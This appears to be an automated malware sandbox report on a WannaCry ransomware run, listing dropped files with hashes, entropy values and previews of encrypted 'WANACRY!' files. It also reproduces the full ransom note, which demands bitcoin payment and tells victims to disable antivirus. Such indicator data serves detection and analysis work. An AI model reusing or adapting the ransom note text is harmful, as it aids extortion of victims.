                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.815526355214315
                                Encrypted:false
                                SSDEEP:24:4dnPyi8yd8QaQAD8M6f1YMUW82TXuxbCkL22aLcM9WjSfe9uCwJc:4dnbv3ADBWYBW82Lg4LcMMjwqL
                                MD5:3D699AD7CCD36C3BE0462054F28EC331
                                SHA1:C0BCAFDE74D16836C268FC5CF0D21114108E2BF4
                                SHA-256:9B6F2187E2D9BF0740597CCF6F4DC387B6C6576147D1185B9DEC2C83CC062B3D
                                SHA-512:B169AE8775265ABA97941812DC7907C15A6E73B1B38B7A3E804F5E2F32D122E4204BD97F1E781D309F33C6533C0D58C323407CD1DCE5FD1FDE99C0E79BDF43D7
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8380556862283
                                Encrypted:false
                                SSDEEP:24:bkDBzyQrw5hSiFUAfOO6SDjzMg7XLSlBSYnuseqQ00YfCyhuysHyxSLoAg6:bk9EjSiXGpSDjIaLEcYuGwvyxSRg6
                                MD5:6E28E747C521ABDAF4DAAB0973728E2C
                                SHA1:547A815AD984B7E28CACFBEEF0A8B927523E04DF
                                SHA-256:51DD50E3AA18BB0C878AA110459CED870B7D2A7A6D42B9CADC364E4DF81B9C53
                                SHA-512:192491EF8E5B36431B65F674AB6811570A3026024CFFD5CD8D252384122C18DADB1038307FF8A65B91BE255E4EA09A64EBF27BA955D61350D591080252710516
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....M......k.i.xQ>..>8..t. .j...^.y|W..4..7...R..S.....#.s.|.2].4..'..............MI.`..2......^.y....h#......n--'/|T.]j)...*.YO.O.&q^?fa.9..C..^.l..+.kI.r...Y.....}*......v#.v.>h0..z.D..]2.e....HY..0#l...g....U.3...g.f!L..Jw.........p.+.x...'.W.............=.I.........`2.Cq.'..-|.0.I.kV....=.:b0S.dF.....?....][.lEY.*...MU..:..8.....2A~H..+@.<.)..F-.{..F.\..Z.N.|..v...b|..j.uy....,.....W.}.h}.......,.c...S..m........G!..(2...8..q..M.%.x..uS.G...m.U..t..s.H..U9.ksC8c.7I.J...........].b..w.........O......5..v....I...........|wJ.+To...TC..B..]*..{.XFz....k......v./.[B..wR.C"}2.,....Go,t^A..|..l"S..~V.WUa.u.oU......Yc..Fc....C"....b...CX...F...6+V6.........sw.C.c.eB.....`j....j.3FW..%.g.X....P....0..gh..3..Z5...ole.8G.)..lY..b...w.........[A..39U.[.....Z.oe.w....'..kH.jz\(.Q..8.....;;.\V.g.s..CDv..g.._?AK|8..6......Q!.......Ca.v..,v=...~n .x.H.@Y..+....R...$'wC..-8...).................7...U....qI.`.D<..&e..U..F..Q=...P.{s...$.H{
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.801069531693805
                                Encrypted:false
                                SSDEEP:24:3Bduhh2YqUw5V4ujJniOLKqpIv59sZU/DCpTq6DIn:buhhGUUVVtrpmIICpT/8n
                                MD5:3B3C2DBF05EB52364A54F40B4BA42FA2
                                SHA1:328F9E49D284E9AC79519857B24D40D798FA8CD7
                                SHA-256:2E9B2EAF90D6E09B3C35E389285FA7CDE7F3CAC59FC46D0C5D19BC7893BE021B
                                SHA-512:E391A23F620FB32E830C8324A2D5A9C89EE5F89F25CED8C3113AD347AE82CA3FB6048DCA6D591F0FD10C6FFA423873BF3B93479F4C1AC197723078DC00AF0C3E
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.836803931340838
                                Encrypted:false
                                SSDEEP:24:bkSIldIU9GAYAEpFwrB1c8dbcsBk9KRqkqY2EOUMVOTwEUrhIg:bkSzbxfFwr7nRcYPLQESnEUz
                                MD5:FAFB85C1E434EB4D95669B4B0C16221C
                                SHA1:FE8CAE52DF52C89D37E40FD85F9C72C0740A3320
                                SHA-256:33068912BD041B826988D6DDAB238313D8CF6774FEAE6F844C0B334B1C526AF5
                                SHA-512:73DC96B2356AB4A1D1375A6592611E4737F4D673950D2D97450255556C92A6641383ED3E745E5AD1D70C14721B082B3BF59AECE3E321A326CDDB2B68259DA452
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....qG]..e.S....9.uLJ......kc..W2.6zU.......u..{....O.F.O.bc.`8z.)a.5A.m'.3B...!.0...._..q....Z..)......O..g.s.x-....|Z..T[.|..............$.."...4.P_J.b..X..k..[..h.CL-c2....!+.....z...N.CG..FkO.6.F!.L.(.X[B.n.d..1{.&.)M...R...)T.S..%.....L..s.............p...c.=b.u.!f.D2U.(.&...|s..7.Y...-B.3...Gem..T...q.-.`Q......=.Z..p...M...4n2U.../e6#6K6/..i0.sf.3/..@w......3.z.1...n.....E($Y.._...doj.Z.Fj0B.c...8..;...P|{.s.*v..|.\...|....CM=9.( \..X7.......i......k+wH..;.. e9."0(..!-........=Z.v.(..G=.........n.e..k.6..6.O.......n.Zp..\n. ...Vu$z...?cR....6.G..x.`....6.me...[;f...:..q.-+...km.fg..;....N.tjXl..H#...a/.[.Sn..b"...P _i..^.=.,.F;....N.E...k.$0~..#...?....=J.A.r.<..(.. ...fDO..A.._/..3q.P.......v'..6.K8F...q]`.h."-V....W.B....2........jGZ.b.N...<.^..+.,..Xp.x.(j.#R.V..#..c.S.]..|..tD`B..........}..!B.n.ttv...}...u.k..Er..%..........p.y....l.......+.]@D...f..?....k...j..}....T. 8...n*........\.X.. ....Bo...~.....|/.r..f..F#......$
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8009335500453405
                                Encrypted:false
                                SSDEEP:24:+P5UFPb+hWc5gbc5MeMPnQwDNOP+0cOYOwqUZNbg:+Pwbh46ZQwVBbbZNE
                                MD5:C76C97AF5155D8D45C77251AC058B05D
                                SHA1:FD97918328EEC651C2097481AF79E1897BDBE808
                                SHA-256:E03718FB35B91D44CE72F65B795A0CF9A1564C78FF16E50328ECC5BD5CF87FCC
                                SHA-512:8A6CC72F5197023B24CA909356BC7B12A86AE146822876266B2A5DE592018B152F8D29374D07C63107739614A926FC763E994BA9FDAB75176E14A95554FBF302
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.833916873906602
                                Encrypted:false
                                SSDEEP:24:bkgRoECWkwH6Z897rIDd72cOEGKw55MU4YVxfmUp54YnHh8ei1Pn3:bkcvq89C724w5Bz/xHhTGP3
                                MD5:27B4C825BBD61ECFEB3292BFAAEF6FE0
                                SHA1:47BC282AE45772BF1C2B6C90343A7426A1027CAF
                                SHA-256:7CAB22321FDCBC765CD758F79F565899FA829FBCF6ABB19BEE88E8105B64B38E
                                SHA-512:3976CC257818A9CA28BB423AA32FFB16D2844D16F56C851B665D0BCF4046DE576B07B17456968F23025649681E31227FC28598BD73373A40F98E7541344ABCAC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......#. 8.Bx....u..3..?...^....{..~...?.0.u.~..D...X..%.h..}..A.:%..Mc$2....=.....x=o--.uD|..!..^.JW..r....5ZP.....DBV/..f.q.x.e$...&0.}./.}...i.}.XL.``...2....u...n..'...Hz../8...N*..`...1*..A.C.W.6a;.XV19...O..E4.U..K..\V....$.qG..8.=.i.iXs..{..............gep^B.O^.T.......@.......pa...Z.F(..V....b..wE.A8.?Y...gdR.8..J...(w.0.h(.J....H.;..F.D..{^..f..".#..'\H.l...Kc....3&..jm..*5ybX|C.z...M?......*..\.`...z..-0.#...F..^.h.*..W...R.g.6..)Ak...ah..r...?.?..3...v.n...u..=.......Y.msbX....L.&.b..8L.m.rE.\....#.(~d.......0b.s....._0..~...i..z.6u$....I]^...G./r.....|p..OU...-......h...Y....0p...dW.H4.K...YC...).r.>:....e..2...=O.QQU..).=.6..... 6...Bm&L.!K...W.&f4B....=...PW.MA.._..}2X^]|.[.q..../.....0.)..."3..c...j..#o^.........4!.59t.&|Z/.b..).qIOl'8.C.............M..B..6\.{T0a?x<.|...t.vb.|..1.....}.....C=.G..j.O..i2Fc..[2.LH.'.d...8@..T.|....9e....h....#Z...c...$.vK..z,.:l......F......\..]...L.l..$k...T....DJ..V...P$... .o...bg
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8221945248161004
                                Encrypted:false
                                SSDEEP:24:sen4xpSkY7xt1MS9zTq8MOVYsRFREaQjwtqsCvq2:senopa9zJYGFpQTsoq2
                                MD5:E04504D117FF1C640ADD01A66F016303
                                SHA1:3998EFC829A74687D2220211010E3179C55A1516
                                SHA-256:F80108933806A316D083289121073D78F6501AD3AD9220F4D2F6644842DED102
                                SHA-512:326AB37575F51BF7E567913FBE584AB77322FCB0A694BCB4491B83E1472FDABA55F95AB36E71DB8FB45F517BA6846C2FE264DC95BA54B763E88675409777BA85
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.833732535096494
                                Encrypted:false
                                SSDEEP:24:bkXa6SCrfQLVadCBE+DwK63Wgfbbqanhr+cnWdFZxUq0UkIsU1UxVyj11uI8v:bkmBadCBE+DwV3TqqGFZxUq1jUqj1kIq
                                MD5:40E0AB96F2EAD8A3A41A27EAB5FDC40F
                                SHA1:C9D9F7DF4ED293CF37507B2393579EBE2C596FF6
                                SHA-256:63B8385B0300444B85EBD38456083DE2A661EA2441B3139B5D2923F6ADBE1748
                                SHA-512:DBEF27E7E88D159F6A161109A13FB484CB9745CEDF2285B0E9CA2F9C2059953AA6E5C541B983016766E7DBAA4267D00CD201B58AFD32C3BA12AB7018B8B0F4BC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.833732535096494
                                Encrypted:false
                                SSDEEP:24:bkXa6SCrfQLVadCBE+DwK63Wgfbbqanhr+cnWdFZxUq0UkIsU1UxVyj11uI8v:bkmBadCBE+DwV3TqqGFZxUq1jUqj1kIq
                                MD5:40E0AB96F2EAD8A3A41A27EAB5FDC40F
                                SHA1:C9D9F7DF4ED293CF37507B2393579EBE2C596FF6
                                SHA-256:63B8385B0300444B85EBD38456083DE2A661EA2441B3139B5D2923F6ADBE1748
                                SHA-512:DBEF27E7E88D159F6A161109A13FB484CB9745CEDF2285B0E9CA2F9C2059953AA6E5C541B983016766E7DBAA4267D00CD201B58AFD32C3BA12AB7018B8B0F4BC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.819752227099647
                                Encrypted:false
                                SSDEEP:24:/HWaNUzGT3InGK4XduXvqNsFL2+3epyNXBJaz+xhLsiqEF:/HXqGcGVe1+yZazKhLxF
                                MD5:D19869A107385A44A62379D03093602E
                                SHA1:833D57810D30680E02B660EB563BB04F4DDDF5FA
                                SHA-256:33EA6E1DFBCDC4798810550352B572B834CFBD4A6AA9AB89371548C95E1D7C21
                                SHA-512:E9E114F004404776BE3CE4EFD89A766875CF46608C845092B092E31A6CA053CEAF8AFAC7B98F3631369F70443369415F86DD4005B81B3FFE11A8772D77864238
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.83943220356204
                                Encrypted:false
                                SSDEEP:24:bk/VwyDVkuCNebKNJYgB74Sb8r3EN0SY26DeJs0tDhCJmwZ1K8gP7fUDA2Wy:bkrDceKNJY2dwr3E7Y26y20tDCmJxPI9
                                MD5:8ADF20532C370B655FC150B98C0458EA
                                SHA1:EE125A373B58C35235F2A0E0265FD18AF499108A
                                SHA-256:9299F8102F8EF90D36CF02680571E2F38B808A9E10EBA711BB69B85327292497
                                SHA-512:1DEC64B6ECDB4770FF54880666C3F7BE2EAF6A5F66EE7901129C3B3C309A754292BF8BBD3EB9C883C2E8810EFA22828D54930FF34ABCC53DE9470EBD9FD53814
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.83943220356204
                                Encrypted:false
                                SSDEEP:24:bk/VwyDVkuCNebKNJYgB74Sb8r3EN0SY26DeJs0tDhCJmwZ1K8gP7fUDA2Wy:bkrDceKNJY2dwr3E7Y26y20tDCmJxPI9
                                MD5:8ADF20532C370B655FC150B98C0458EA
                                SHA1:EE125A373B58C35235F2A0E0265FD18AF499108A
                                SHA-256:9299F8102F8EF90D36CF02680571E2F38B808A9E10EBA711BB69B85327292497
                                SHA-512:1DEC64B6ECDB4770FF54880666C3F7BE2EAF6A5F66EE7901129C3B3C309A754292BF8BBD3EB9C883C2E8810EFA22828D54930FF34ABCC53DE9470EBD9FD53814
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.7981482626715035
                                Encrypted:false
                                SSDEEP:24:3FnKcCN1iRGrGGykz9poRMe59JBF4SwgRcLQgfR0an:AcCN1iQrtl9poRMeV34bgRja
                                MD5:869DE36ABB794747F650FC31F8ECCB8C
                                SHA1:C3979F7A8DBE909623C87FCDFDA249C586898487
                                SHA-256:3231296BDBFEA2041801C7CA247C0E4876021ACD4E7CF34029F4B478DBC4B2D8
                                SHA-512:8F12002E09759C839107A12E583EEDC3C4B56CAA6A415AECB5E875DFD876B52724E9D4CCF27042DD3BE83D23513693E4C32C98A6E7648573A5B88FFC143CA2BD
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.832345468265153
                                Encrypted:false
                                SSDEEP:24:bkM6+2667wlhj7kpB+KBL+IOayqtSMsSj9VsTxN6zm7c2F2VXiiAyyj9Q63s7Vj6:bkz667uj7E+UtShS5AxszGjMOyYIVCb
                                MD5:E8752016336FA3CDD3A76B780320A97D
                                SHA1:EBBCE5E8A38395A0E59B25AC39424CA806840B46
                                SHA-256:D20BE0D292531E803C2C082DEBE1D4C1529DEAD64EA6E97CE0271E6573A015DC
                                SHA-512:F7107ADCC6A5F15FD5DC060A3DEC4B0C433867865DD6458B6E99E6DCA86E5F96E4C9B85D2A92ACB93BD5346A3736A7F22AF445BD1EC117BB131E2E1C6381203B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.832345468265153
                                Encrypted:false
                                SSDEEP:24:bkM6+2667wlhj7kpB+KBL+IOayqtSMsSj9VsTxN6zm7c2F2VXiiAyyj9Q63s7Vj6:bkz667uj7E+UtShS5AxszGjMOyYIVCb
                                MD5:E8752016336FA3CDD3A76B780320A97D
                                SHA1:EBBCE5E8A38395A0E59B25AC39424CA806840B46
                                SHA-256:D20BE0D292531E803C2C082DEBE1D4C1529DEAD64EA6E97CE0271E6573A015DC
                                SHA-512:F7107ADCC6A5F15FD5DC060A3DEC4B0C433867865DD6458B6E99E6DCA86E5F96E4C9B85D2A92ACB93BD5346A3736A7F22AF445BD1EC117BB131E2E1C6381203B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):245760
                                Entropy (8bit):6.278920408390635
                                Encrypted:false
                                SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                MD5:7BF2B57F2A205768755C07F238FB32CC
                                SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 96%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.832522092590801
                                Encrypted:false
                                SSDEEP:24:bkObMJ46FJiM0qR2BIklBTYJid9cpOiv6Y+hvY+IM2uv+osQlyN0q:bkl46FJiMJgWklBQiDcpYYyvY+AGvrUN
                                MD5:B8F6B29F78898399B73C248FCFE9E078
                                SHA1:C278B26CE2DAB6431750D2E4E479B2596D277A0F
                                SHA-256:098585C264F1EEEB90092D3F2F939378837DC80435E318B09EA86FF24B4250E5
                                SHA-512:BF1807AC66D2168EAFB92E418AEBB0A9F9C794AF5F7C49FD87AC04C4CAABE3E470D5AE232D40388527EBE2BA80D5780260D0A0CA274921507D3D482F7FE62DE4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8505685355613
                                Encrypted:false
                                SSDEEP:24:bk/xlR+gOH/vnTIn1tH4fv6m0kPwx3JqyKAVXwkmeSILX:bk/RkfG1tHeoJq6Hme3
                                MD5:1E5C277D620571C2E899B291161AF83A
                                SHA1:0A25848000F6BC17AFD724107DC08E968DB0C35F
                                SHA-256:F0D3CC05FCB513C107DA7F23C3E41B37766945EFB6F6EA244A6E651D6C989EF5
                                SHA-512:60987DF412BEB71756B9A43C2A54AC15C62804191F84B2CA43FF0315D6CB50DF6FCBDEBE6DA78024B6D33FCA02AB70DAC71343C8B467DF4FCBE0DFAE411FD58F
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.814028573461258
                                Encrypted:false
                                SSDEEP:24:bkmY3RoUPTqMKQX+hPc6UownNv1754jF1wi2LrRGnkgKN+W4:bkmmRRrqMRXec6Av1mJOjR9nNW
                                MD5:FA3954774C3BED2B0C03FA7ED3B0D995
                                SHA1:F0EAC93DB39695ADC1B015B63798850034DFAE8E
                                SHA-256:AFA7AD6B2DAF8E270CEC41CCDFFF8DEE27F9DA0F4E92780DEB854712768542A1
                                SHA-512:1D84901E540121B3375A2D51F616819BA12E584A379288D62E203C57BE7AC4756E15F27956532605E97CF20CB1CBE525CF4803B7C4EF94EA76CBE4554F8A8222
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8433977714800385
                                Encrypted:false
                                SSDEEP:24:bkUZNLqZ12toDwSxwksoiUWxO5qD9J16s4qWOmJwmB5TVgPBzxra:bkUZgZ12tUDRFi15Lo95O+w65Z0Za
                                MD5:794F8BB42C90B566FA9CAE748E9893A7
                                SHA1:D9F03C214BB83DBB391F39E7EB1CE901AF9C2585
                                SHA-256:C66A0F5626178A25A8CD961B9F3BC9423638F815C6F6FD7AB9DAC10345B549B9
                                SHA-512:453A31C57C19079C6278C31763C91C64DE678B5041C9D32A48F44BBCD2D08E1A4EFB9FB743F468D4EA49350A7B90E2DF3103BC8E3003AD00617751FCB21FB332
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.854025596643254
                                Encrypted:false
                                SSDEEP:24:bk5ajgMtVW46ODeyyuHrpxP/RnQq0VB2Jx3f69bGw/SPNH1k0ME:bk5ulW4tRVx3RQ5kmvSPNLME
                                MD5:FF69DF1EAD582915A27B85F372AFAA6E
                                SHA1:A4E59376BA8EEF9AB6696F683E04AC6938F471DC
                                SHA-256:FB9978D78208C5F275829997CB027CECF7D2246C3C18AF5FF3FFAFC29DF34856
                                SHA-512:DC57CEAC7B06A8B883F655E8E3C16C936F184B4671F5CD3FA59AD8206A3C5C228CAD3EE020BA695A7A95160E27DBB2A624C6544667F7537C356F97FD3F13DF7C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8307922297876615
                                Encrypted:false
                                SSDEEP:24:bkCshLIvt+eIwfOb9qhz46lcmxxqzxbumO7WUZe3MAFyMBRREW1mDCBmeMOA+yTe:bkCnzbfBhzgCAxCkUIt3EWMC0eMcl
                                MD5:51945D90B02325120FBE1391081280D6
                                SHA1:24FAF4FE9B05E32D422C0055658C749EE53D5D84
                                SHA-256:07A7D3B178579AF322C4E52005479633912CFFFDA2B8E562CB2827EBE554A30A
                                SHA-512:4B0587976C065F9E99E135878799C698280ADE00B02B6CC3C571B99D255EBBB7941B62554988CC472AFA9351AD7BC3A7FB1BFC81782E091EB2F70122678F521A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.849610407296905
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.827183757966153
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.838501770158683
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.829501966490435
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.825624611685154
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.83950670458498
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.860933346082135
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.84952384993601
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8753434673666565
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8496831722921225
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.851812909912617
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.838728057263532
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8373031912395845
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843132259331841
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.854865218310198
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.834722866247955
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.812229501434341
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....[>......&9"T...H.{..w.....M.?Y...@9cQ......[....i..p(,....(h.0.sf....p...qK..\...(E)........s4.Lf.e...fD.vD...w..m}..qji.W.,..>.M'}.,.?i#..._..H.......YC...D...`..H8..C.......SP....6.......k.~.~..[.m..p<...9QZ..P.............`....n.C....1..............Ne"...M).b#._u...Q.... .2w......m.D<6..9...7f.+).@Q...@.Z .6^i....i.7..ygb........n..C.wK....,.XN.D[......(..#.....E...2.J.2{..m.o.q...Lx..j.!...5#.......'...,..X.......N.YwVFA.....]u.....u.h.5.&.ZV......?[.I.|.q...P.\.@kM....w..&...Xh|....F4........<..Z...M.b.}a*,.cT...y...R.*w4...3....c.\s.....!.)..%zL|J.#............hY.t...Z,.{Q.\$.9.N./.5Z0>..W.....\.....MQ.z....z..>..e.0ex.+...B.2.:.+..**...3U^.M`..2..j...)......}.....7G.....'...z.H$.....wK..H...X>.....H.n.4...i|z}P.............")...Mi.?G...[.......<./..t~e.Y8i./....).....)B.u.{.'.:....xS...g9G..c...0...?M.F..!...;.....{.......<...h.R.V...I(-%.9.|.^..&0>...>.....=YV`SigO..HyL./.u.....^...).#.5o`".+...=#....zW.f......
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.840221560663818
                                Encrypted:false
                                SSDEEP:24:bkq9WKVrpT1OIvhRZjXKwfSBG3uOWPXEvGnI1DhcNOXYRmG3ICEv/rsec3gn:bkWNVRDDfk+5WPUuneVaOaICGrth
                                MD5:793749CC06DFD3BA53BBFB204C7D4A73
                                SHA1:16D8ECF4F6B21BD6E1700F129829C1F8AC9D8BE9
                                SHA-256:5A6C7783B4AFCC41611A19D9A6CB323ED7403FC7811541CD10A14C7C7DE97E4C
                                SHA-512:8F5EB902300414F446D2921D09BA4131C64E7BEBC2871BB46DE52315D451B8803AD6F4D1377EB3B1BE480EB48CF4BD240D70DCC3F8E566EC2DDE1E0D0298C04C
                                Malicious:false
                                Reputation:unknown
